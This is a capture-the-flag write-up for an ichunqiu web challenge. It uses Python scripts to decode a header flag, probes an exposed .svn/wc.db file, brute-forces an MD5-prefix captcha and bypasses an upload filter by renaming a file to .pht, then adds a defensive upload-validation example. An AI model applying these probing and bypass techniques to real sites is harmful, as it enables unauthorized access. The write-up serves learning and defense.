Visit the challenge URL; the response is as follows:
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Thu, 28 Dec 2017 08:19:49 GMT
Content-Type: text/html
Content-Length: 87
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.19
Set-Cookie: PHPSESSID=uftmhmic9cts56dopv6vf7pjt1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
flag: ZmxhZ19pc19oZXJlOiBNakkxTXpnMw==
Vary: Accept-Encoding
Hi,CTFer!u should be a fast man:)<!-- Please post the ichunqiu what you find -->
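Base64-decode the flag header, Base64-decode the value it contains a second time, and send the result back. The Python code is as follows:
import base64
import requests
url = "http://17d0e7ece2b246f993d2aee4ba32ea60ce0e9f6a78714602.game.ichunqiu.com/"
a = requests.session()  # one session, so the PHPSESSID cookie is reused for the POST
b = a.get(url)
key1 = b.headers["flag"]
c = base64.b64decode(key1).decode()  # decodes to "flag_is_here: <base64 value>"
d = c.split(':')
key = base64.b64decode(d[1].strip()).decode()  # second decode gives the value to post
body = {"ichunqiu": key}
f = a.post(url, data=body)
print(f.text)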
Result: Path:3712901a08bb58557943ca31f3487b7d
http://17d0e7ece2b246f993d2aee4ba32ea60ce0e9f6a78714602.game.ichunqiu.com/3712901a08bb58557943ca31f3487b7d
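Clicking through leads to the login page: action.php?action=login
Visit URL+/xxxx/.svn/wc.db (SVN source code disclosure vulnerability)
This yields the hint: username is md5(HEL1OW10rDEvery0n3)
The login page shows that the first six characters of the MD5 of the captcha must be xxxxxx, so the matching captcha has to be found before the form can be submitted.
Write a script to brute-force the captcha: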
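import hashlib
def md5(s):
    # hex MD5 digest of the decimal string form of s
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()
def main(s):
    # try integers until the first six hex characters of the digest equal s
    for i in range(1,99999999):
        if md5(i)[0:6] == str(s):
            print(i)
            exit(0)
if __name__ == '__main__':
    main("xxxx")  # replace with the prefix shown on the login page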
Username: 8638d5263ab0d3face193725c23ce095
Password: 123456
Captcha: run the brute-force script
The 7815696ecbf1c96e6894b779456d330e.php:)Welcome 8638d5263ab0d3face193725c23ce095!
http://17d0e7ece2b246f993d2aee4ba32ea60ce0e9f6a78714602.game.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/7815696ecbf1c96e6894b779456d330e.php
Upload a jpg, intercept the request with Burp and change the extension to pht, and the flag is returned.
flag{0959114c-4de1-4413-959c-22e0c7885c60}
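The upload step above works because the server accepts a file whose extension was changed to pht in transit. The following added example (not part of the original writeup or the challenge's code) puts a deny-list check next to a hardened upload check; `naive_accepts`, `hardened_store_name` and the sample byte strings are hypothetical, and the deny-list is an assumption about how such a filter fails, since the challenge's server-side code is not shown.

```python
import secrets

# Hypothetical "before": a deny-list that only knows about .php (assumed; the
# challenge's real server-side check is not shown in the writeup).
def naive_accepts(filename):
    return not filename.lower().endswith(".php")

# Leading magic bytes of the only formats accepted, mapped to the extension
# the server itself assigns to the stored file.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

def hardened_store_name(filename, data):
    """Return a server-generated file name, or None if the upload is rejected."""
    # 1. Allow-list on the client-supplied extension: pht, phtml, php5 all fail.
    _, dot, ext = filename.rpartition(".")
    if not dot or ext.lower() not in ALLOWED_EXT:
        return None
    # 2. The content must start like an image; a renamed script does not.
    for magic, canonical in MAGIC.items():
        if data.startswith(magic):
            # 3. Never reuse the client's name or extension for the stored file.
            return secrets.token_hex(16) + "." + canonical
    return None

if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # constructed sample: JPEG header only
    script = b"<?php /* constructed sample */ ?>"
    for name, body in [("a.jpg", jpeg), ("a.pht", jpeg),
                       ("a.pht", script), ("a.jpg", script)]:
        print(name, naive_accepts(name), hardened_store_name(name, body))
```

Storing uploads outside the web root, or in a location where the PHP handler is disabled, covers the remaining case of an image file that also contains script code.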